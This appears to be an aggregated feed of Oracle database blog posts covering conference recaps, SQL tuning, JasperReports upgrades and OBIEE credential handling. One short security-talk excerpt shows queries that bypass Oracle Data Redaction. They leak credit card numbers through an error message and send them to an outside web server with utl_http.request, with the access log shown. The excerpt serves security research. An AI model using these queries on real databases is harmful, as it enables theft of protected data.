First things first: It was a great event!
Many thanks to the DOAG staff for offering and organizing it, great job!
Top-notch speakers and Oracle celebrities with so many great presentations that I really felt sorry to be unable to clone myself in order to attend multiple sessions in parallel.
Let me mention just a few that I attended:
There was Graham Wood with his talk DB Time-based Oracle Performance Tuning: Theory and Practice
Another very interesting presentation was Kyle Hailey's about Instant DB Cloning
One goodie here: Check out clonedb with MOS Note 1210656.1 or this article http://www.oracle-base.com/articles/11g/clonedb-11gr2.php
It went on with Larry Carpenter talking about Best Practices for Data Availability and Disaster Protection
On we went with Julian Dontcheff’s Upgrading to Oracle 12c
I was really pleased to meet him in person for the first time since we have had some contact over social media before – that’s one of the best things about these conferences
One highlight was the option to do the upgrade to 12c (not just the recompilation!) in parallel.
Then came Joel Goodman with his presentation about RAC Global Resource Management Concepts
Mark Scardina then almost convinced me that it may indeed be useful to create Server Pools with his talk Why and How You Should Be Using Policy-Managed Oracle RAC Databases
In particular, you can control the start order and priority of services when servers get scarce (e.g., after a crash)
My own presentation about Materialized Views & Partition Change Tracking almost filled room 2 and got strong applause, so I consider it a success
A very instructive talk by Mike Dietrich followed, about Working with Multitenant Databases in Practice
You can download the slides from his blog. One highlight: In 12c, you have Full Transportable Export/Import which is a combination of Transportable Tablespaces and full export – very cool!
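For reference, on the source side a full transportable export is driven by just two Data Pump parameters; a minimal sketch (the directory object and file names here are made up, and version=12 applies when exporting from an 11.2.0.3/11.2.0.4 source):

expdp system full=y transportable=always version=12 directory=dp_dir dumpfile=ftex.dmp logfile=ftex.log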
We saw a great presentation also by Kai Yu about Achieving Availability and Scalability with Oracle 12c Flex Clusters
and I was glad to meet him in person there! One key point: Flex Clusters need Flex ASM, but Flex ASM can also be used by Standard Clusters
Markus Michalewicz did a great job with his presentation about RAC 12c Best Practices – if I should recommend only one talk, this would probably be it.
One out of many key points was the recommendation to install Oracle Grid Infrastructure for a Cluster for any deployment, whether it be a Single Instance Database or an Oracle RAC Database.
Then I went to Frank Schneede to hear about 12c New Features for Data Warehousing
Very good – as usual – was also Christian Antognini with Query Optimizer 12c New Features
A DOAG highlight was also the Data Guard Expert Panel; I felt honored to be invited to join it alongside a legend like Larry Carpenter
All in all a great conference! Looking forward to DOAG 2014 already
Mike McKay-Dirden recently wrote to me asking if I would speak at a new event he’s trying to establish called Oracle Midlands. You can read his thoughts about it on the about page. It’s similar to the types of things the Pythian guys do with the local meetups.
The success or failure of this sort of thing is totally down to the level of participation by the attendees, so get signing up if you want to be part of it! Also, if you come along and chat to Mike, you can help shape future events…
Tim…
I just uploaded my DOAG 2013 presentation “Best of Oracle Security 2013”.
This presentation shows how to bypass Oracle Data Redaction, become DBA using CREATE ANY INDEX, hide information from Oracle Auditing using VPD, and more…
SQL> select * from scott.credit_card where 1=ordsys.ord_dicom.getmappingxpath((card_id),user,user);
ERROR at line 1:
ORA-53044: invalid tag: 1234-1234-1234-1234
ORA-06512: at "ORDSYS.ORDERROR", line 5
ORA-06512: at "ORDSYS.ORD_DICOM_ADMIN_PRV", line 1394
ORA-06512: at "ORDSYS.ORD_DICOM_ADMIN_PRV", line 479
ORA-06512: at "ORDSYS.ORD_DICOM_ADMIN_PRV", line 8232
ORA-06512: at "ORDSYS.ORD_DICOM", line 756
ORA-06512: at line 1
select * from credit_card where 1=length(utl_http.request('http://192.168.2.102:8080/'||card_id));
==> bypassing the obfuscation because the utl_http.request is located in the where clause
-------- output from access.log --------
192.168.2.101 - - [13/Sep/2013:15:19:20 Central Europe Daylight Time] "GET /1234-1234-1234-1234 HTTP/1.1" 404 35 - -
192.168.2.101 - - [13/Sep/2013:15:19:20 Central Europe Daylight Time] "GET /5678-5678-5678-5678 HTTP/1.1" 404 35 - -
-------- output from access.log --------
Bit of a corner case this week, but I wanted to park this as much for my reference as yours. Need to be able to test a pure XSL template against some sample data? That's an XSL template that is going to generate HTML, text or XML. The Template Viewer app in the BI Publisher Desktop group does not offer that as an option. It does offer XSL-FO processing though.
A few minutes digging around in the java libraries and I came up with a command line solution that is easy to set up and use.
1. Place your sample XML data and the XSL template in a directory
2. Open the lib directory where the TemplateViewer is installed. On my machine that is d:\Oracle\BIPDesktop\TemplateViewer\lib
3. Copy the xmlparserv2.jar file into the directory created in step 1.
4. Use the following command in a DOS/Shell window to process the XSL template against the XML data.
java -cp ./xmlparserv2.jar oracle.xml.parser.v2.oraxsl fileX.xml fileY.xsl > fileX.xls
The file generated will depend on your XSL. For an Excel output, you would instruct the process to generate fileX.xls in the same folder. You can then test the file with Excel, a browser or a text editor. Now you can test on the desktop until you get it right without the overhead of having to load it to the server each time.
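If you want a trivial pair of files to smoke-test the setup, something like these will do (hypothetical fileX.xml and fileY.xsl, producing a small HTML table):

fileX.xml:

<?xml version="1.0"?>
<ROWSET>
 <ROW><NAME>Widget</NAME><QTY>3</QTY></ROW>
</ROWSET>

fileY.xsl:

<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
 <xsl:output method="html"/>
 <xsl:template match="/">
  <table>
   <xsl:for-each select="ROWSET/ROW">
    <tr><td><xsl:value-of select="NAME"/></td><td><xsl:value-of select="QTY"/></td></tr>
   </xsl:for-each>
  </table>
 </xsl:template>
</xsl:stylesheet>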
To be completely clear, this approach is for pure XSL templates that are designed to generate text, HTML or XML. It's not for the XSL-FO templates that might be used at runtime to generate PDF, PPT, etc. For those you should use the Template Viewer application; it supports the XSL-FO templates but not the pure XSL templates.
If your template falls into the pure XSL category but the command still fails, this will be down to you using some BIP functionality in the template. To get it to work you'll need to add the Publisher libraries that contain the functions, e.g. xdo-core.jar, i18nAPI_v3.jar, etc., to the classpath argument (-cp).
So a new command including the required libraries might look like:
java -cp ./xmlparserv2.jar;./xdo-core.jar;./i18nAPI_v3.jar oracle.xml.parser.v2.oraxsl fileX.xml fileY.xsl > fileX.xls
You will need to either move the libraries to the local directory (my assumption above) or include the full path to them, as sketched below. More info here on setting the -cp attribute.
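For example, referencing the jars in place with full paths (using the install location from my machine above; adjust to yours) might look like:

java -cp d:\Oracle\BIPDesktop\TemplateViewer\lib\xmlparserv2.jar;d:\Oracle\BIPDesktop\TemplateViewer\lib\xdo-core.jar;d:\Oracle\BIPDesktop\TemplateViewer\lib\i18nAPI_v3.jar oracle.xml.parser.v2.oraxsl fileX.xml fileY.xsl > fileX.xls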
There are two steps you have to take to "save big". First, become a full member of ODTUG for $99 and enjoy all of the benefits, including access to a members-only presentations library, throughout the year. Next, register for Kscope14 and you are eligible for the members-only price of $1500 for a savings of $150. While you are registering, simply use the code AOLAP to get an additional $100 discount!
My company, Applied OLAP, is one of the top-tier Platinum Sponsors of Kscope14 and I will be there. I hope to see you at the conference and, if you were able to save some money by using our exclusive AOLAP code, be sure to stop by our booth, say hello, and learn how the Dodeca Spreadsheet Management System can help your company reduce spreadsheet risk, increase spreadsheet accuracy, and reduce costs.
Jonathan Lewis pointed out this interesting article on conversions at SQLfail: When is SYSDATE != SYSDATE?
Another angle on relational systems vs. hierarchical/object oriented is this article from Sarah Mei: Why You Should Never Use MongoDB.
At Database Journal: Compression and Advanced Compression in Oracle 11.2.
Making a test case can be a challenge, and usually comes along just when everyone is breathing down your neck. Good posting on the Oracle 11g SQL Test Case Builder (original post) from CzmMiao的博客生活 (CzmMiao's blog).
The Hotsos Symposium 2014 will be held March 2-6, 2014 in Irving, TX. This is always one of the best, if not the best performance conferences for Oracle professionals.
Oracle Data Integrator 12c release : Part 2, from RittmanMead.
SOA Proactive Support brings us: Scripted SOA Diagnostic Dumps for PS6 (11.1.1.7).
From Pythian: How to Download Oracle Software Using WGET or CURL.
Oracle Endeca Information Discovery 3.1 and Self-Service Data Mashup capability, from RittmanMead.
Data Warehousing and the Oracle Exadata System – Intel Chip Chat – Episode 279, from Connected Social Media.
Spacewalk 2.0 provided to manage Oracle Linux systems, from Wim Coekaerts Blog.
From Ronald Bradford, the MySQL Expert blog: What SQL is running MySQL.
Coming up on 20-NOV-2013: Oracle 7th Annual Federal Forum.
A recent study showed that occasional distractions in the course of the work day are actually good for staying sharp and focused when you are working. Well here is the mother lode of distractions, a site consisting totally of those silly but engaging lists you see at the bottom of various website pages.
We are now accepting abstracts for speaker proposals: GLOC 2014 abstracts
It is the standard speaking gig: free conference attendance for speakers and a one-hour time slot.
Keynotes Tuesday by Tom Kyte and Steven Feuerstein ... workshops Monday by Carlos Sierra and Scott Spendolini (maybe a 3rd or 4th workshop?).
This year we are working on a stronger Apps track ... expecting the usual high quality sessions for DBA / Developer / DW&BI tracks.
The call for abstracts will be open for a long time ... this is just the first notification that it is now available.
I hope to see you at GLOC 2014!
Thanks John Hurley aka @GrumpyOldDBA aka NEOOUG President
Yesterday I was trying to figure out if any queries on a particular production database were using subpartition statistics on a certain table. We are having trouble getting the statistics gathering job to finish gathering stats on all the subpartitions of this table in the window of time we have given the stats job. My thought was that we may not even need stats on the subpartitions, so I wanted to find queries that would prove me wrong.
My understanding of Oracle optimizer statistics is that there are three levels – table or global, partition, and subpartition. The table I am working on is partitioned by range and subpartitioned by list. So, I think that the levels are used in these conditions:
- Global or table: Range that crosses partition boundaries
- Partition: Range is within one partition but specifies more than one list value
- Subpartition: Range is within one partition and specifies one list value
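To make that concrete, here is a minimal sketch (table and column names are hypothetical) of the kind of composite partitioning and predicates I mean:

create table sales_by_week (
  sale_week   date,
  location_id number,
  amount      number
)
partition by range (sale_week)
subpartition by list (location_id)
subpartition template (
  subpartition loc_1 values (1),
  subpartition loc_2 values (2)
)
(
  partition w20130609 values less than (to_date('20130616','YYYYMMDD')),
  partition w20130616 values less than (to_date('20130623','YYYYMMDD'))
);

-- range within one partition, one list value: should use subpartition stats
select sum(amount) from sales_by_week
where location_id = 1
and sale_week between to_date('20130609','YYYYMMDD') and to_date('20130614','YYYYMMDD');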
The table I was working on was partitioned by week and subpartitioned by location, so a query that specified a particular week and an individual location should use the subpartition stats.
So, I did some experimentation and came up with this query:
select p.PLAN_HASH_VALUE, min(p.sql_id), count(*)
from DBA_HIST_SQL_PLAN p
where p.OBJECT_OWNER='MYOWNER'
and p.OBJECT_NAME='MYTABLE'
and p.partition_start=p.partition_stop
and substr(p.partition_start,1,1) in ('0','1','2','3','4','5','6','7','8','9')
and p.sql_id in (select sql_id from DBA_HIST_SQLSTAT)
group by p.PLAN_HASH_VALUE
order by p.PLAN_HASH_VALUE;
I’ve replaced the real owner and table name with MYOWNER and MYTABLE. The point of this query is to find the distinct plans that use subpartition statistics and one sql query as an example of each plan. There were multiple queries with the same plans but slightly different constants in their where clause so I just needed one example of each.
In my experimentation I found that plans that had the same numbers for the partition stop and start were the plans that used subpartition stats. I’m not sure about the plans that don’t have numbers in their partition start and stop columns.
Here is what the output looks like:
PLAN_HASH_VALUE MIN(P.SQL_ID)   COUNT(*)
--------------- ------------- ----------
      151462653 fugdxj00cnwxt          1
      488358452 21kr79rst8663          2
      634063666 5fp4rnzgw6gvc          1
     1266515004 98zbx8gw95zf8          2
     1397966543 37gaxy58sr1np          2
     1468891601 5fp4rnzgw6gvc          1
     1681407819 001aysuwx1ba4        230
     1736890182 64tmnnap05m6b          2
     2242394890 2tp8jx3un534j          1
     2243586448 9fcd80ms6h7j4          2
     2418902214 64tmnnap05m6b          1
     2464907982 5fp4rnzgw6gvc          1
     3840767159 05u7fy79g0jgr        143
     4097240051 5mjgz2v8a3p6h          1
This is the output on our real system. Once I got this list I built a script to dump out all of these plans and the one sql_id for each:
select * from table(DBMS_XPLAN.DISPLAY_AWR('fugdxj00cnwxt',151462653,NULL,'ALL'));
select * from table(DBMS_XPLAN.DISPLAY_AWR('21kr79rst8663',488358452,NULL,'ALL'));
select * from table(DBMS_XPLAN.DISPLAY_AWR('5fp4rnzgw6gvc',634063666,NULL,'ALL'));
select * from table(DBMS_XPLAN.DISPLAY_AWR('98zbx8gw95zf8',1266515004,NULL,'ALL'));
select * from table(DBMS_XPLAN.DISPLAY_AWR('37gaxy58sr1np',1397966543,NULL,'ALL'));
select * from table(DBMS_XPLAN.DISPLAY_AWR('5fp4rnzgw6gvc',1468891601,NULL,'ALL'));
select * from table(DBMS_XPLAN.DISPLAY_AWR('001aysuwx1ba4',1681407819,NULL,'ALL'));
select * from table(DBMS_XPLAN.DISPLAY_AWR('64tmnnap05m6b',1736890182,NULL,'ALL'));
select * from table(DBMS_XPLAN.DISPLAY_AWR('2tp8jx3un534j',2242394890,NULL,'ALL'));
select * from table(DBMS_XPLAN.DISPLAY_AWR('9fcd80ms6h7j4',2243586448,NULL,'ALL'));
select * from table(DBMS_XPLAN.DISPLAY_AWR('64tmnnap05m6b',2418902214,NULL,'ALL'));
select * from table(DBMS_XPLAN.DISPLAY_AWR('5fp4rnzgw6gvc',2464907982,NULL,'ALL'));
select * from table(DBMS_XPLAN.DISPLAY_AWR('05u7fy79g0jgr',3840767159,NULL,'ALL'));
select * from table(DBMS_XPLAN.DISPLAY_AWR('5mjgz2v8a3p6h',4097240051,NULL,'ALL'));
Here is an edited-down output of just the relevant part of the first plan:
Plan hash value: 151462653

------------------------------------------------------------------
| Id  | Operation                  | Name    | Pstart| Pstop |
------------------------------------------------------------------
|  31 |  TABLE ACCESS STORAGE FULL | MYTABLE |  41017| 41017 |
------------------------------------------------------------------
This query had conditions in its where clause like this:
LIST_COLUMN = 1234 AND (RANGE_COLUMN BETWEEN TO_DATE('20130609000000','YYYYMMDDHH24MISS') AND TO_DATE('20130615000000','YYYYMMDDHH24MISS'))
I’ve renamed the real column for the list subpartitioning to LIST_COLUMN and the real column for the range partitioning to RANGE_COLUMN.
One interesting thing I realized was that since we are on an Exadata system and there are no visible indexes on the subpartitioned table, the subpartition stats aren’t being used to determine whether the query will use an index scan or a full scan. But they are used in these queries to determine the number of rows the full scan will return, so they could still impact the plan.
I’m thinking of using table preferences to just turn off the subpartition stats gathering using a call like this:
begin
  DBMS_STATS.SET_TABLE_PREFS(
    'MYOWNER','MYTABLE',
    pname=>'GRANULARITY',
    pvalue=>'GLOBAL AND PARTITION');
end;
/
As it is, the table has 40,000 subpartitions and the daily stats job isn’t finishing anyway, so regardless of the queries that use the subpartition stats I think we should set the preference. Maybe just leave dynamic sampling to handle the queries that actually use the one subpartition’s stats, or have some application job gather stats on the one subpartition when it is initially loaded. It is a work in progress, but I thought I would share what I’ve been doing.
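For the load-time idea, the application job could gather stats on just the newly loaded subpartition, along these lines (the subpartition name here is hypothetical):

begin
  DBMS_STATS.GATHER_TABLE_STATS(
    ownname     => 'MYOWNER',
    tabname     => 'MYTABLE',
    partname    => 'MYTABLE_W20130609_LOC1',
    granularity => 'SUBPARTITION');
end;
/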
By the time of posting, this is already not the most current version: JasperReports has moved on to 5.5.0. But since I created the 5.2.0 package a while ago, I might just post the instructions here. The 5.5.0 version will follow.
Here you go ...
This is an updated version of the original instructions found here: http://daust.blogspot.de/2013/01/upgrading-jasperreports-libraries-to-501.html
Step 1: Download the library files for 5.2.0
You can download the files here:
Step 2: Shut down the Apache Tomcat J2EE server
Step 3: Remove the existing JasperReports libraries from your existing installation
Typically, after you have installed a previous version of the JasperReportsIntegration toolkit (for example one based on JasperReports 4.7.0) on your Apache Tomcat J2EE server, the library files will be located in the directory $CATALINA_HOME/webapps/JasperReportsIntegration/WEB-INF/lib, where $CATALINA_HOME represents the path to your Tomcat installation.
You would then have to remove these libraries first. In this directory you should find two removal scripts: _jasper-reports-delete-libs-4.7.0.sh and _jasper-reports-delete-libs-4.7.0.cmd, for *nix and Windows respectively. On *nix systems you have to make the script executable first, e.g.: chmod u+x _jasper-reports-delete-libs-4.7.0.sh. Then you can call it and it will remove all files for version 4.7.0, but it will NOT remove the JasperReportsIntegration file itself or any other libraries which YOU might have placed there deliberately.
You can always find the required removal scripts here: http://www.opal-consulting.de/downloads/free_tools/JasperReportsLibraries/ .
Whenever I release another package, the removal scripts for that package will be shipped as well.
Step 4: Install the new 5.2.0 libraries
Now you can just copy the new libraries from JasperReportsLibraries-5.2.0.zip into $CATALINA_HOME/webapps/JasperReportsIntegration/WEB-INF/lib.
Step 5: Start the Apache Tomcat J2EE server again
Now your system should be upgraded to the most current JasperReports 5.2.0!
Just drop me a note when you need updated libraries for a later JasperReports version, etc. I have scripts in place to create a new package of the libraries.
Here you can find the notes from my upgrade (4.5.0 => 4.8.0) on Linux to illustrate the process, I hope it makes sense:
** download the libraries from:
** to /home/jasper/JasperReportsLibraries
** unzip them
unzip JasperReportsLibraries-4.8.0.zip -d JasperReportsLibraries-4.8.0
** stop tomcat server
** remove libraries of current jasper reports release
chmod +x _jasper-reports-delete-libs-4.5.0.sh
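** run the removal script (this is the step the chmod above prepares for)
./_jasper-reports-delete-libs-4.5.0.sh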
** copy libraries of the new release to the WEB-INF/lib directory
cp /home/jasper/JasperReportsLibraries/JasperReportsLibraries-4.8.0/* /home/jasper/tomcat/webapps/JasperReportsIntegration/WEB-INF/lib
** restart tomcat
Cloud computing is allowing big data enterprises to transform how they manage stores of information. Rather than relying on legacy solutions, such as on-premises datacenters, to house digital assets, businesses are now capable of purchasing scalable memory. With this strategy, it's easier for IT managers to upgrade storage swiftly.
More options mean more solutions
In addition to these strategies, InformationWeek reported that the recent surge of cloud services has provided enterprises with new options for crafting unique and efficient methods of governing their data. For example, information can be partitioned into different sections of the storage space according to how often it is accessed.
As the cloud enables employees to sync with data at any time, as long as they are utilizing an Internet-optimized device, the introduction of a cloud-based infrastructure could potentially make certain layers of information more heavily trafficked. According to the source, however, enterprises can now leverage flash storage arrays, which will provide organizations with an alternative storage functionality to handle increases in data access. All other information that typically has a much lower traffic rate can still be housed traditionally.
Hybrid cloud options, such as the example listed above, enable IT managers to retain more control over their sensitive data. Converged cloud infrastructures, for instance, allow decision-makers to leverage more applications that can be deployed across digital architectures. These strategies, such as database administration services, provide organizations with fully operational cloud solutions that can be configured to support the overall needs of the company. Remote DBA services also make categorizing data simpler and faster, allowing tech teams to focus their energies on maintaining the daily operations of the company.
Transforming the business landscape
The Guardian noted that cloud computing has become more than a trend in the enterprise landscape. More companies are integrating a cloud option into their existing infrastructures, making it easier for them to augment the speed and agility of their services. Additionally, as the cloud advances, more options are becoming available for IT managers that will allow companies to maintain a stronger edge over their competition.
Decision-makers should be considering how the cloud can transform their operations without costing more in legacy upgrades.
RDX offers a full suite of cloud migration and administrative services that can be tailored to meet any customer's needs. To learn more about our full suite of cloud migration and support services, please visit our Cloud DBA Service page or contact us.
If you are using a desktop PC running Windows, but spend your life connecting to UNIX and Linux servers, like most DBAs and sysadmins, you really need this in your life! It’s so much better than anything I’ve ever used before. Even those really expensive desktop X emulators (you know who you are)! What’s more, it’s a self-contained .exe, so no need for installation. Just unzip and go. Perfect on a memory stick!
Tim…
I tried executing top, and some of the time it also ended up with a segmentation fault. At the times it would start, it would give a flashing
I checked the server memory and it had 73 GB free memory.
Eventually I opened up the adpreclone.pl script in vi to study what it was doing. In one place, I noticed that it was looking for the environment variable $USER. When I checked on the server, echo $USER did not return anything. On other working servers, echo $USER returned the unix applmgr username.
So I manually set the USER environment variable.
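Something along these lines, assuming applmgr is the applications OS user as on the working servers:

export USER=applmgr

Then I re-ran the preclone: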
perl adpreclone.pl appsTier
Entered the apps password, and it worked fine.
This was a new server; it seems the unix team missed something during the build. I tried looking in /etc/profile, but wasn't able to find out why the environment variable USER was not set. I'll update this post when I discover the reason.
by Steven Feuerstein, 2013
I should not be here.
I should not be.
Too many humans
devouring the world.
I would leave
to save a single tree
or to ensure
a fern leaf unfurled.
But I'll stay, instead,
and switch allegiance
from a genocidal species
to my planet, my home:
my home of surpassing beauty.
If I stay, instead,
and save a single tree
and help tree ferns
unfurl their leaves,
perhaps I could at least
Out of these I would recommend Console (From Browser, Batch), EMCLI (command line, Batch) and PULL (command line) methods.
Refer: Console Method (From Browser, Batch): http://docs.oracle.com/cd/E24628_01/install.121/e22624/install_agent.htm#CACJEFJI
EMCLI (command line, Batch) (New from 12.1.0.3): http://www.oracle.com/technetwork/oem/install-upgrade/em-12103-agent-deployment-1967206.pdf
All other methods: http://docs.oracle.com/cd/E24628_01/install.121/e24089/install_agent_usng_rsp.htm
You can contribute your EM 12c content on the above site.
A Guest Post by Esteban Kolsky, industry influencer
The great experiment continues. We are exploring and establishing the right questions to ask when undertaking a customer experience initiative.
So far we have discussed who owns the customer experience and the cultural (people) aspects of deploying a customer experience initiative. In this third post I’m going to talk about processes. (This sponsored research investigation into customer experience is brought to you via my good friends at Oracle.)
The format of this exercise is to pose four questions around the topics of people, process, and technology and explore the implications of each question. The questions, and more importantly your answers, should give you sufficient information to launch your customer experience initiative—or at least to build a framework towards it.
First, are your processes well documented?
I have very interesting discussions with clients when I ask this question. Of course, the initial answer is always yes—followed by something like “we spent x amount of time doing a BPO project and it is all documented.” My follow up question is always—are your processes updated? Most organizations fail to implement some sort of technology or workflow that will allow them to continuously update the documentation (or in some cases, even find the documentation after the initial project). Any minor change—a compliance requirement, a change in organization hierarchies, a departure of a staff member in some cases—can change the process. Even if the changes are slight, they can accumulate over time and translate into large changes.
Action Items: 1) Ensure that documentation exists and can be easily found, 2) Keep the documentation updated, and 3) Make sure the process changes you make can be introduced into the existing documentation.
Second, do you have flexible processes?
Most everyone believes their processes are flexible. After all, nearly all processes have been modified numerous times since their inception, and that clearly denotes their flexibility, right? Yes, to a certain extent. However, a large number of processes are inflexible because of their dependency on a specific person, channel, location, or even a system or solution (called external dependencies). This is not about dependencies between processes (I cover that below). This is about processes that have external dependencies and no inter-process dependencies. In reality, not having interaction with other processes is what makes a process less flexible, because some of the work and information is likely (or at least possibly) going to be repeated across different processes. Therefore, having rigid processes that cannot be replaced or integrated with new processes can create major problems.
Action Item: First, understand the dependencies between processes and external factors, such as people, solutions, and technologies—anything that is not a process. Second, find a way to replace the dependency with one that is more sensible. Then the process can be flexible enough to be extended or modified.
Third, do you understand the dependencies between processes?
There is no process that exists by itself, independent of anything else. As a matter of fact, the entire concept of creating and building processes exists because of their interdependencies—to ensure that the actions executed by those processes are leveraged in one part of the organization and then generate a result in another part of the organization. The question to ask is: are the dependencies between processes well documented so if (more likely, when) you make a change to a process, you know what other processes are affected and can quickly implement necessary changes?
Action Item: Ensure the interdependencies between processes are documented and that the documentation processes can accommodate new and different relationships between them.
Fourth, do you have processes for changing processes?
This might seem like a redundant question to ask; however, it is actually one of the most important aspects of changing processes—and all due to a single reason. When you change a process once, you will need to change it again. The benefits from a single change compound over time as more changes are made (from single adjustments to entire end-to-end reengineering). This is why you need to make sure you have a process in place to make the changes: nothing is once-and-done when it comes to processes. Furthermore, changes done for the purpose of customer experience are always going to have a shorter life than any other change, mainly because the customers’ needs and wants will change constantly. Other variables, such as channels, resolutions, or compliance, also will change, and there is going to be a need to revamp them often.
Action Item: If you don’t have a process for changing processes, that should be your first stop in the adoption of customer experience.
These are the basic questions you will need to ask yourself to undertake the process changes necessary to adopt a customer experience initiative. Of course, the project becomes more complex when you weave these answers with your answers from the previous post (changes in culture to deliver better customer experiences). And that needs to be done before you undertake the final set of questions (coming in the next post) on technology use for customer experience.
Until then, I would love to hear from you. Are these questions representative of the changes in process that you have experienced when undertaking a customer experience initiative? Is your experience different? What am I missing?
Note: You can respond via my blog or scroll down and post a comment.
Busy times lately here at the ‘Lab. We’ve grown from a small band of three to six in the past six weeks.
Joining our happy little crew are Osvaldo, whom we were lucky to find on our adventure to Mexico, Raymond, a friend of Anthony’s from Taleo, and Tony, whom I’ve known for many years.
Our ‘Lab veterans have been road warriors lately. Earlier this week, Anthony spoke at the OTN China Tour in Beijing, showing off the Glass concept app he built, as well as the Leap Motion-controlled robotic arms he and Noel hacked together right before OpenWorld.
Noel was in Mexico, and soon, he’ll be heading to UKOUG Tech 13 to speak. His session is called “Oracle Fusion & Cloud Applications: A Platform for Building New User Experiences” at the happy hour friendly time of 17:45 on Tuesday, December 3.
If you’re attending Tech 13, drop by and say hi, or just look for Noel. He’ll be hanging around the show all week.
Anyway, I have a backlog of posts, just not a backlog of time to push them. Stay tuned.

Possibly Related Posts:
- Hot Oracle Applications User Experience News
- See You at Kscope 13
- OpenWorld Developer Challenges
- Messing around with Glass and Fusion CRM for Kscope 13
- NWOUG 2012 Conference
We all love a good commandline utility. It gives us that warm feeling of control and puts hairs on our chests. Either that, or it means we can script the heck out of a system, automate many processes, and concentrate on more important matters.
However, some of the OBIEE commandline utilities can’t be used in Production environments at many sites because they need the credentials for OBIEE stored in a plain-text file. Passwords in plain-text are bad, mmmm’kay?
Two utilities in particular that it is a shame can’t be scripted up and deployed in Production because of this limitation are the Presentation Services Catalog Manager and the Presentation Services Replication Agent. Both perform very useful purposes, and what I want to share here is a way of invoking them more securely.

Caveat
IANAC: I Am Not A Cryptographer! Nor am I a trained security professional. Always consult a security expert for the final word on security matters.
The rationale behind developing the method described below is that some sites will have a “No Plaintext Passwords” policy which flat out prevents the use of these OBIEE utilities. However, at the same sites the use of SSH keys to enable one server to connect to another automatically is permitted. On that basis, the key-based encryption for the OBIEE credentials may therefore be considered an acceptable risk. As per Culp’s 9th law of security administration, it’s all about striking the balance between enabling functionality and mitigating risk.
The method described below is, I believe, a bit more secure than plaintext credentials, but it is not totally secure. It uses key-based encryption to secure the previously-plaintext credentials that the OBI utility requires. This is one step better than plaintext alone, but is still not perfect. If an attacker gained access to the machine they could still decrypt the file, because the key is held on the machine without a passphrase to protect it. The risk here is that we are using security by obscurity (because the OBIEE credentials are in an encrypted file it appears secure, even though the key is held locally), and like the emperor’s new clothes, if someone takes the time to look closely enough there is still a security vulnerability.
My final point on this caveat is that you should always bear in mind that if an attacker gains access to your OBIEE machine then they will almost certainly be able to do whatever they want regardless, including decrypting the weblogic superuser credentials or resetting them to a password of their own choosing.

Overview
Two new shiny tools I’ve acquired recently and am going to put to use here are GnuPG (gpg) and mkfifo. GPG provides key-based encryption and decryption and is available by default on common Linux distributions including Oracle Linux. mkfifo is also commonly available and is a utility that creates named pipes, enabling two unrelated processes to communicate. For a detailed description and advanced usage of named pipes, see here.
This is a one-time setup activity: we create a key in gpg, and then encrypt the plain text credentials file using it.

The first step is to create a gpg key, using gpg --gen-key. You need to specify a “Real name” to associate with the key; I just used “obiee”. Make sure you don’t specify a passphrase (otherwise you’ll be back in the position of passing plain text credentials around when you use this script).
$ gpg --gen-key
gpg (GnuPG) 1.4.5; Copyright (C) 2006 Free Software Foundation, Inc.
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions. See the file COPYING for details.

Please select what kind of key you want:
   (1) DSA and Elgamal (default)
   (2) DSA (sign only)
   (5) RSA (sign only)
Your selection?
DSA keypair will have 1024 bits.
ELG-E keys may be between 1024 and 4096 bits long.
What keysize do you want? (2048) 2048
[...]
Real name: obiee
Email address:
Comment:
[...]
You don't want a passphrase - this is probably a *bad* idea!
I will do it anyway. You can change your passphrase at any time,
using this program with the option "--edit-key".
[...]
gpg: key 94DF4ABA marked as ultimately trusted
public and secret key created and signed.
Once this is done, you can encrypt the credentials file you need for the utility. For example, the Catalog Manager credentials file has the format:
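Something like this two-line properties file (the exact key names are an assumption on my part; check the Catalog Manager documentation for your version):

login=weblogic
pwd=Password01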
To encrypt it, use:
gpg --recipient obiee --output saw_creds.gpg --encrypt saw_creds.txt
Now remove the plaintext password file.
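For example, assuming the filename used above (shred -u overwrites the file before removing it, which is a little safer than a plain rm):

shred -u saw_creds.txt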
Using the secure credentials file
Once we have our encrypted credentials file we need a way of using it with the utility it is intended for. The main thing we’re doing is making sure we don’t expose the plaintext contents. We do this using the named pipes method:
In this example I am going to show how to use the secure credentials file with runcat.sh, the Catalog Manager utility, to purge the Presentation Services cache. However, it should work absolutely fine with any utility that expects credentials passed to it in a file (or stdin).
There is a three-step process:
1. Create a named pipe with mkfifo. This appears on a disk listing with the p bit to indicate that it is a pipe, and access to it can be controlled by the same chmod permissions as a regular file. With a pipe, a process can request to consume from it, and anything that is passed to it by another process will go straight to the consuming process, in a FIFO fashion. What we’re doing through the use of a named pipe is ensuring that the plain text credentials are not visible in a plain text file on the disk.
2. Invoke the OBIEE utility that we want to run. Where it expects the plaintext credentials file, we pass it the named pipe. The important bit here is that the utility will wait until it receives the input from the named pipe, so we call the utility with an ampersand so that it returns control whilst still running in the background.
3. Use gpg to decrypt the credentials file, and pass the decrypted contents to the named pipe. The OBIEE utility is already running and listening on the named pipe, so it will receive (and remove from the pipe) the credentials as soon as they are passed from gpg.
The script that will do this is as follows:
# Change folder to where we're invoking the utility from
cd $FMW_HOME/instances/instance1/bifoundation/OracleBIPresentationServicesComponent/coreapplication_obips1/catalogmanager

# Create a named pipe
mkfifo cred_pipe

# Let's make sure only we can access it
chmod 600 cred_pipe

# Invoke Catalog Manager. Because we're using a named pipe, it's actually
# going to sit and wait until it gets input on the pipe, so we need to put
# the ampersand in there so that it returns control to the script
./runcat.sh -cmd clearQueryCache -online http://localhost:9704/analytics/saw.dll -credentials cred_pipe &

# Decrypt the credentials and send them to the named pipe
gpg --quiet --recipient obiee --decrypt saw_creds.gpg > cred_pipe

# Remove the named pipe
rm cred_pipe
Depending on the utility that you are invoking, you may need to customise this script. For example, if the utility reads the credentials file multiple times then using the named pipes method it will fail after the first read. Your options would be to read the credentials into the pipe multiple times (possibly a bit hacky), or to land the plaintext credentials to disk and delete them after the utility completes (which could be less secure if the delete doesn’t get invoked).

Using a secure credentials file for command line arguments
Whilst the sticking point that triggered this article was around utilities requiring whole files with credentials in them, it is also common to see command line utilities that want a password passed as an argument. For example, nqcmd:
nqcmd -d AnalyticsWeb -u weblogic -p Password01 -s myscript.lsql
Let’s assume we’ve created an encrypted file containing “Password01” (using the gpg --encrypt method shown above) and saved it as password.gpg.
